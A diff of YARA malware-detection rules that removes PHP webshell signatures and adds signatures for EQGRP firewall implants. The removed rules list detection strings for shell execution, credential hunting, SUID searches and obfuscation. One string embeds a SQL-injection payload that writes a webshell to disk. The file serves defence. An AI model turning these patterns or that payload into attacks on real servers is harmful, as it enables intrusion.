-		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
-		$m_cpayload_preg_filter2 = "'|.{0,500}|e'" nocase wide ascii
-		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
-		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
-		$gen_bit_sus6 = "self.delete"
-		$gen_bit_sus9 = "\"cmd /c" nocase
-		$gen_bit_sus10 = "\"cmd\"" nocase
-		$gen_bit_sus11 = "\"cmd.exe" nocase
-		$gen_bit_sus12 = "%comspec%" wide ascii
-		$gen_bit_sus13 = "%COMSPEC%" wide ascii
-		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
-		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
-		$gen_bit_sus21 = "\"upload\"" wide ascii
-		$gen_bit_sus22 = "\"Upload\"" wide ascii
-		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
-		$gen_bit_sus24 = "fileupload" wide ascii
-		$gen_bit_sus25 = "file_upload" wide ascii
-		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
-		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
-		$gen_bit_sus30 = "serv-u" wide ascii
-		$gen_bit_sus31 = "Serv-u" wide ascii
-		$gen_bit_sus32 = "Army" fullword wide ascii
-		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
-		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
-		$gen_bit_sus35 = "crack" fullword wide ascii
-		$gen_bit_sus44 = "<pre>" wide ascii
-		$gen_bit_sus45 = "<PRE>" wide ascii
-		$gen_bit_sus46 = "shell_" wide ascii
-		$gen_bit_sus50 = "bypass" wide ascii
-		$gen_bit_sus52 = " ^ $" wide ascii
-		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
-		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
-		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
-		$gen_bit_sus57 = "dumper" wide ascii
-		$gen_bit_sus59 = "'cmd'" wide ascii
-		$gen_bit_sus60 = "\"execute\"" wide ascii
-		$gen_bit_sus61 = "/bin/sh" wide ascii
-		$gen_bit_sus62 = "Cyber" wide ascii
-		$gen_bit_sus63 = "portscan" fullword wide ascii
-		$gen_bit_sus66 = "whoami" fullword wide ascii
-		$gen_bit_sus67 = "$password='" fullword wide ascii
-		$gen_bit_sus68 = "$password=\"" fullword wide ascii
-		$gen_bit_sus69 = "$cmd" fullword wide ascii
-		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
-		$gen_bit_sus71 = "Hacking" fullword wide ascii
-		$gen_bit_sus72 = "hacking" fullword wide ascii
-		$gen_bit_sus73 = ".htpasswd" wide ascii
-		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
-		$gen_bit_sus75 = "uploaded" fullword wide ascii
-		$gen_much_sus7 = "Web Shell" nocase
-		$gen_much_sus8 = "WebShell" nocase
-		$gen_much_sus3 = "hidded shell"
-		$gen_much_sus4 = "WScript.Shell.1" nocase
-		$gen_much_sus5 = "AspExec"
-		$gen_much_sus14 = "\\pcAnywhere\\" nocase
-		$gen_much_sus15 = "antivirus" nocase
-		$gen_much_sus16 = "McAfee" nocase
-		$gen_much_sus17 = "nishang"
-		$gen_much_sus18 = "\"unsafe" fullword wide ascii
-		$gen_much_sus19 = "'unsafe" fullword wide ascii
-		$gen_much_sus24 = "exploit" fullword wide ascii
-		$gen_much_sus25 = "Exploit" fullword wide ascii
-		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
-		$gen_much_sus30 = "Hacker" wide ascii
-		$gen_much_sus31 = "HACKED" fullword wide ascii
-		$gen_much_sus32 = "hacked" fullword wide ascii
-		$gen_much_sus33 = "hacker" wide ascii
-		$gen_much_sus34 = "grayhat" nocase wide ascii
-		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
-		$gen_much_sus36 = "Rootkit" wide ascii
-		$gen_much_sus37 = "rootkit" wide ascii
-		$gen_much_sus38 = "/*-/*-*/" wide ascii
-		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
-		$gen_much_sus40 = "\"e\"+\"v" wide ascii
-		$gen_much_sus41 = "a\"+\"l\"" wide ascii
-		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
-		$gen_much_sus43 = "q\"+\"u\"" wide ascii
-		$gen_much_sus44 = "\"u\"+\"e" wide ascii
-		$gen_much_sus45 = "/*//*/" wide ascii
-		$gen_much_sus46 = "(\"/*/\"" wide ascii
-		$gen_much_sus47 = "eval(eval(" wide ascii
-		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
-		$gen_much_sus49 = "Shell.Users" wide ascii
-		$gen_much_sus50 = "PasswordType=Regular" wide ascii
-		$gen_much_sus51 = "-Expire=0" wide ascii
-		$gen_much_sus60 = "_=$$_" wide ascii
-		$gen_much_sus61 = "_=$$_" wide ascii
-		$gen_much_sus62 = "++;$" wide ascii
-		$gen_much_sus63 = "++; $" wide ascii
-		$gen_much_sus64 = "_.=$_" wide ascii
-		$gen_much_sus70 = "-perm -04000" wide ascii
-		$gen_much_sus71 = "-perm -02000" wide ascii
-		$gen_much_sus72 = "grep -li password" wide ascii
-		$gen_much_sus73 = "-name config.inc.php" wide ascii
-		$gen_much_sus75 = "password crack" wide ascii
-		$gen_much_sus76 = "mysqlDll.dll" wide ascii
-		$gen_much_sus77 = "net user" wide ascii
-		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
-		$gen_much_sus81 = /strrev\(['"]/ wide ascii
-		$gen_much_sus82 = "PHPShell" fullword wide ascii
-		$gen_much_sus821 = "PHP Shell" fullword wide ascii
-		$gen_much_sus83 = "phpshell" fullword wide ascii
-		$gen_much_sus84 = "PHPshell" fullword wide ascii
-		$gen_much_sus87 = "deface" wide ascii
-		$gen_much_sus88 = "Deface" wide ascii
-		$gen_much_sus89 = "backdoor" wide ascii
-		$gen_much_sus90 = "r00t" fullword wide ascii
-		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
-		$gen_much_sus92 = "str_rot13" fullword wide ascii
-		$gif = { 47 49 46 38 }
-		$cmpayload1 = /\beval[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload2 = /\bexec[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload3 = /\bshell_exec[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload4 = /\bpassthru[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload5 = /\bsystem[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload6 = /\bpopen[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload7 = /\bproc_open[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload8 = /\bpcntl_exec[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload9 = /\bassert[\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cmpayload10 = /\bpreg_replace[\t ]{0,500}\([^\)]{1,100}\/e/ nocase wide ascii
-		$cmpayload11 = /\bpreg_filter[\t ]{0,500}\([^\)]{1,100}\/e/ nocase wide ascii
-		$cmpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cmpayload20 = /\bcreate_function[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload21 = /\bReflectionFunction[\t ]{0,500}\([^)]/ nocase wide ascii
-		$fp1 = "# Some examples from obfuscated malware:" ascii
-		$fp2 = "{@see TFileUpload} for further details." ascii
+		$s1 = "LP.c:pixSecurity - Improper number of bytes read in Security/Interface Information" fullword ascii
+		$s2 = "LP.c:pixSecurity - Not in Session" fullword ascii
+		$s3 = "getModInterface__preloadedModules" fullword ascii
+		$s4 = "showCommands" fullword ascii
+		$s5 = "readModuleInterface" fullword ascii
+		$s6 = "Wrapping_Not_Necessary_Or_Wrapping_Ok" fullword ascii
+		$s7 = "Get_CMD_List" fullword ascii
+		$s8 = "LP_Listen2" fullword ascii
+		$s9 = "killCmdList" fullword ascii
 
 	condition:
-		not ( any of ( $gfp_tiny* ) or 1 of ( $fp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $inp* ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( ( filesize < 1000 and not any of ( $wfp_tiny* ) ) or ( ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) and ( filesize > 5KB or not any of ( $wfp_tiny* ) ) ) or ( filesize < 500KB and ( 4 of ( $cmpayload* ) ) ) )
+		( uint16( 0 ) == 0x457f and filesize < 6000KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Callback : FILE
+rule SIGNATURE_BASE_EQGRP_Implants_Gen5 : FILE
 {
 	meta:
-		description = "php webshell having some kind of input and using a callback to execute the payload. restricted to small files or would give lots of false positives"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e33dba84-bbeb-5955-a81b-2d2c8637fb48"
-		date = "2021-01-14"
-		modified = "2023-09-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L413-L718"
+		description = "EQGRP Toolset Firewall"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e35748ee-d530-5e73-a74d-5675d05725e9"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L953-L978"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e98889690101b59260e871c49263314526f2093f"
-		hash = "63297f8c1d4e88415bc094bc5546124c9ed8d57aca3a09e36ae18f5f054ad172"
-		hash = "81388c8cc99353cdb42572bb88df7d3bd70eefc748c2fa4224b6074aa8d7e6a2"
-		hash = "27d3bfabc283d851b0785199da8b1b0384afcb996fa9217687274dd56a7b5f49"
-		hash = "ee256d7cc3ceb2bf3a1934d553cdd36e3fbde62a02b20a1b748a74e85d4dbd33"
-		hash = "4adc6c5373c4db7b8ed1e7e6df10a3b2ce5e128818bb4162d502056677c6f54a"
-		hash = "1fe4c60ea3f32819a98b1725581ac912d0f90d497e63ad81ccf258aeec59fee3"
-		hash = "2967f38c26b131f00276bcc21227e54ee6a71881da1d27ec5157d83c4c9d4f51"
-		hash = "1ba02fb573a06d5274e30b2b05573305294497769414e964a097acb5c352fb92"
-		hash = "f4fe8e3b2c39090ca971a8e61194fdb83d76fadbbace4c5eb15e333df61ce2a4"
-		hash = "badda1053e169fea055f5edceae962e500842ad15a5d31968a0a89cf28d89e91"
-		hash = "0a29cf1716e67a7932e604c5d3df4b7f372561200c007f00131eef36f9a4a6a2"
-		hash = "51c2c8b94c4b8cce806735bcf6e5aa3f168f0f7addce47b699b9a4e31dc71b47"
-		hash = "de1ef827bcd3100a259f29730cb06f7878220a7c02cee0ebfc9090753d2237a8"
-		hash = "487e8c08e85774dfd1f5e744050c08eb7d01c6877f7d03d7963187748339e8c4"
-		logic_hash = "e12dec5252a816c10443fe0e0b40b0b9b4a187b32facd8e09e1f057801da25f9"
-		score = 60
-		quality = -103
+		logic_hash = "d4bbd9dbde4ca1da80d49157363ade3ec47d55828529ec7e1a46b64d07c991f0"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+		hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
+		hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+		hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
+		hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
+		hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
+		hash8 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
-		$gfp_tiny3 = "include \"./common.php\";"
-		$gfp_tiny4 = "assert('FALSE');"
-		$gfp_tiny5 = "assert(false);"
-		$gfp_tiny6 = "assert(FALSE);"
-		$gfp_tiny7 = "assert('array_key_exists("
-		$gfp_tiny8 = "echo shell_exec($aspellcommand . ' 2>&1');"
-		$gfp_tiny9 = "throw new Exception('Could not find authentication source with id ' . $sourceId);"
-		$gfp_tiny10 = "return isset( $_POST[ $key ] ) ? $_POST[ $key ] : ( isset( $_REQUEST[ $key ] ) ? $_REQUEST[ $key ] : $default );"
-		$inp1 = "php://input" wide ascii
-		$inp2 = /_GET\s?\[/ wide ascii
-		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
-		$inp4 = /_POST\s?\[/ wide ascii
-		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
-		$inp6 = /_REQUEST\s?\[/ wide ascii
-		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
-		$inp15 = "_SERVER['HTTP_" wide ascii
-		$inp16 = "_SERVER[\"HTTP_" wide ascii
-		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
-		$inp18 = "array_values($_SERVER)" wide ascii
-		$inp19 = /file_get_contents\("https?:\/\// wide ascii
-		$callback1 = /\bob_start[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback2 = /\barray_diff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback3 = /\barray_diff_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback4 = /\barray_filter[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback5 = /\barray_intersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback6 = /\barray_intersect_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback7 = /\barray_map[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback8 = /\barray_reduce[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback9 = /\barray_udiff_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback10 = /\barray_udiff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback11 = /\barray_udiff[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback12 = /\barray_uintersect_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback13 = /\barray_uintersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback14 = /\barray_uintersect[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback15 = /\barray_walk_recursive[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback16 = /\barray_walk[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback17 = /\bassert_options[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback18 = /\buasort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback19 = /\buksort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback20 = /\busort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback21 = /\bpreg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback22 = /\bspl_autoload_register[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback23 = /\biterator_apply[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback24 = /\bcall_user_func[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback25 = /\bcall_user_func_array[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback26 = /\bregister_shutdown_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback27 = /\bregister_tick_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback28 = /\bset_error_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback29 = /\bset_exception_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback30 = /\bsession_set_save_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback31 = /\bsqlite_create_aggregate[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback32 = /\bsqlite_create_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback33 = /\bmb_ereg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$m_callback1 = /\bfilter_var[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$m_callback2 = "FILTER_CALLBACK" fullword wide ascii
-		$cfp1 = /ob_start\(['\"]ob_gzhandler/ nocase wide ascii
-		$cfp2 = "IWPML_Backend_Action_Loader" ascii wide
-		$cfp3 = "<?phpclass WPML" ascii
-		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
-		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
-		$gen_bit_sus6 = "self.delete"
-		$gen_bit_sus9 = "\"cmd /c" nocase
-		$gen_bit_sus10 = "\"cmd\"" nocase
-		$gen_bit_sus11 = "\"cmd.exe" nocase
-		$gen_bit_sus12 = "%comspec%" wide ascii
-		$gen_bit_sus13 = "%COMSPEC%" wide ascii
-		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
-		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
-		$gen_bit_sus21 = "\"upload\"" wide ascii
-		$gen_bit_sus22 = "\"Upload\"" wide ascii
-		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
-		$gen_bit_sus24 = "fileupload" wide ascii
-		$gen_bit_sus25 = "file_upload" wide ascii
-		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
-		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
-		$gen_bit_sus30 = "serv-u" wide ascii
-		$gen_bit_sus31 = "Serv-u" wide ascii
-		$gen_bit_sus32 = "Army" fullword wide ascii
-		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
-		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
-		$gen_bit_sus35 = "crack" fullword wide ascii
-		$gen_bit_sus44 = "<pre>" wide ascii
-		$gen_bit_sus45 = "<PRE>" wide ascii
-		$gen_bit_sus46 = "shell_" wide ascii
-		$gen_bit_sus50 = "bypass" wide ascii
-		$gen_bit_sus52 = " ^ $" wide ascii
-		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
-		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
-		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
-		$gen_bit_sus57 = "dumper" wide ascii
-		$gen_bit_sus59 = "'cmd'" wide ascii
-		$gen_bit_sus60 = "\"execute\"" wide ascii
-		$gen_bit_sus61 = "/bin/sh" wide ascii
-		$gen_bit_sus62 = "Cyber" wide ascii
-		$gen_bit_sus63 = "portscan" fullword wide ascii
-		$gen_bit_sus66 = "whoami" fullword wide ascii
-		$gen_bit_sus67 = "$password='" fullword wide ascii
-		$gen_bit_sus68 = "$password=\"" fullword wide ascii
-		$gen_bit_sus69 = "$cmd" fullword wide ascii
-		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
-		$gen_bit_sus71 = "Hacking" fullword wide ascii
-		$gen_bit_sus72 = "hacking" fullword wide ascii
-		$gen_bit_sus73 = ".htpasswd" wide ascii
-		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
-		$gen_much_sus7 = "Web Shell" nocase
-		$gen_much_sus8 = "WebShell" nocase
-		$gen_much_sus3 = "hidded shell"
-		$gen_much_sus4 = "WScript.Shell.1" nocase
-		$gen_much_sus5 = "AspExec"
-		$gen_much_sus14 = "\\pcAnywhere\\" nocase
-		$gen_much_sus15 = "antivirus" nocase
-		$gen_much_sus16 = "McAfee" nocase
-		$gen_much_sus17 = "nishang"
-		$gen_much_sus18 = "\"unsafe" fullword wide ascii
-		$gen_much_sus19 = "'unsafe" fullword wide ascii
-		$gen_much_sus24 = "exploit" fullword wide ascii
-		$gen_much_sus25 = "Exploit" fullword wide ascii
-		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
-		$gen_much_sus30 = "Hacker" wide ascii
-		$gen_much_sus31 = "HACKED" fullword wide ascii
-		$gen_much_sus32 = "hacked" fullword wide ascii
-		$gen_much_sus33 = "hacker" wide ascii
-		$gen_much_sus34 = "grayhat" nocase wide ascii
-		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
-		$gen_much_sus36 = "Rootkit" wide ascii
-		$gen_much_sus37 = "rootkit" wide ascii
-		$gen_much_sus38 = "/*-/*-*/" wide ascii
-		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
-		$gen_much_sus40 = "\"e\"+\"v" wide ascii
-		$gen_much_sus41 = "a\"+\"l\"" wide ascii
-		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
-		$gen_much_sus43 = "q\"+\"u\"" wide ascii
-		$gen_much_sus44 = "\"u\"+\"e" wide ascii
-		$gen_much_sus45 = "/*//*/" wide ascii
-		$gen_much_sus46 = "(\"/*/\"" wide ascii
-		$gen_much_sus47 = "eval(eval(" wide ascii
-		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
-		$gen_much_sus49 = "Shell.Users" wide ascii
-		$gen_much_sus50 = "PasswordType=Regular" wide ascii
-		$gen_much_sus51 = "-Expire=0" wide ascii
-		$gen_much_sus60 = "_=$$_" wide ascii
-		$gen_much_sus61 = "_=$$_" wide ascii
-		$gen_much_sus62 = "++;$" wide ascii
-		$gen_much_sus63 = "++; $" wide ascii
-		$gen_much_sus64 = "_.=$_" wide ascii
-		$gen_much_sus70 = "-perm -04000" wide ascii
-		$gen_much_sus71 = "-perm -02000" wide ascii
-		$gen_much_sus72 = "grep -li password" wide ascii
-		$gen_much_sus73 = "-name config.inc.php" wide ascii
-		$gen_much_sus75 = "password crack" wide ascii
-		$gen_much_sus76 = "mysqlDll.dll" wide ascii
-		$gen_much_sus77 = "net user" wide ascii
-		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
-		$gen_much_sus81 = /strrev\(['"]/ wide ascii
-		$gen_much_sus82 = "PHPShell" fullword wide ascii
-		$gen_much_sus821 = "PHP Shell" fullword wide ascii
-		$gen_much_sus83 = "phpshell" fullword wide ascii
-		$gen_much_sus84 = "PHPshell" fullword wide ascii
-		$gen_much_sus87 = "deface" wide ascii
-		$gen_much_sus88 = "Deface" wide ascii
-		$gen_much_sus89 = "backdoor" wide ascii
-		$gen_much_sus90 = "r00t" fullword wide ascii
-		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
-		$gen_much_sus92 = "base64_decode(base64_decode(" fullword wide ascii
-		$gen_much_sus93 = "eval(\"/*" wide ascii
-		$gen_much_sus94 = "http_response_code(404)" wide ascii
-		$gif = { 47 49 46 38 }
+		$x1 = "Module and Implant versions do not match.  This module is not compatible with the target implant" fullword ascii
+		$s1 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.log" fullword ascii
+		$s2 = "%s/BF_%04d%02d%02d.log" fullword ascii
+		$s3 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.bin" fullword ascii
 
 	condition:
-		not ( any of ( $gfp* ) ) and not ( any of ( $gfp_tiny* ) ) and ( any of ( $inp* ) ) and ( not any of ( $cfp* ) and ( any of ( $callback* ) or all of ( $m_callback* ) ) ) and ( filesize < 1000 or ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) )
+		( uint16( 0 ) == 0x457f and 1 of ( $x* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Base64_Encoded_Payloads : FILE
+rule SIGNATURE_BASE_EQGRP_Pandarock : FILE
 {
 	meta:
-		description = "php webshell containing base64 encoded payload"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4e42b47d-725b-5e1f-9408-6c6329f60506"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L720-L870"
+		description = "EQGRP Toolset Firewall - from files pandarock_v1.11.1.1.bin, pit"
+		author = "Florian Roth (Nextron Systems)"
+		id = "aa0ee05b-b3e4-576a-8a32-bdc8d98fe636"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L980-L1007"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "88d0d4696c9cb2d37d16e330e236cb37cfaec4cd"
-		hash = "e3b4e5ec29628791f836e15500f6fdea19beaf3e8d9981c50714656c50d3b365"
-		hash = "e726cd071915534761822805724c6c6bfe0fcac604a86f09437f03f301512dc5"
-		hash = "39b8871928d00c7de8d950d25bff4cb19bf9bd35942f7fee6e0f397ff42fbaee"
-		hash = "8cc9802769ede56f1139abeaa0735526f781dff3b6c6334795d1d0f19161d076"
-		hash = "4cda0c798908b61ae7f4146c6218d7b7de14cbcd7c839edbdeb547b5ae404cd4"
-		hash = "afd9c9b0df0b2ca119914ea0008fad94de3bd93c6919f226b793464d4441bdf4"
-		hash = "b2048dc30fc7681094a0306a81f4a4cc34f0b35ccce1258c20f4940300397819"
-		hash = "da6af9a4a60e3a484764010fbf1a547c2c0a2791e03fc11618b8fc2605dceb04"
-		hash = "222cd9b208bd24955bcf4f9976f9c14c1d25e29d361d9dcd603d57f1ea2b0aee"
-		hash = "98c1937b9606b1e8e0eebcb116a784c9d2d3db0039b21c45cba399e86c92c2fa"
-		hash = "6b6cd1ef7e78e37cbcca94bfb5f49f763ba2f63ed8b33bc4d7f9e5314c87f646"
-		hash = "51c2c8b94c4b8cce806735bcf6e5aa3f168f0f7addce47b699b9a4e31dc71b47"
-		hash = "7a16311a371f03b29d5220484e7ecbe841cfaead4e73c17aa6a9c23b5d94544d"
-		hash = "e2b1dfcfaa61e92526a3a444be6c65330a8db4e692543a421e19711760f6ffe2"
-		logic_hash = "8f606dc3e1e688cca144fe769af50980b4c25fa69b08c67aca8c676a6a060010"
+		logic_hash = "d0a61410d7c5f309489ef4553f41a3a6fb7d0f24bcdb1f0d88e896265513add2"
 		score = 75
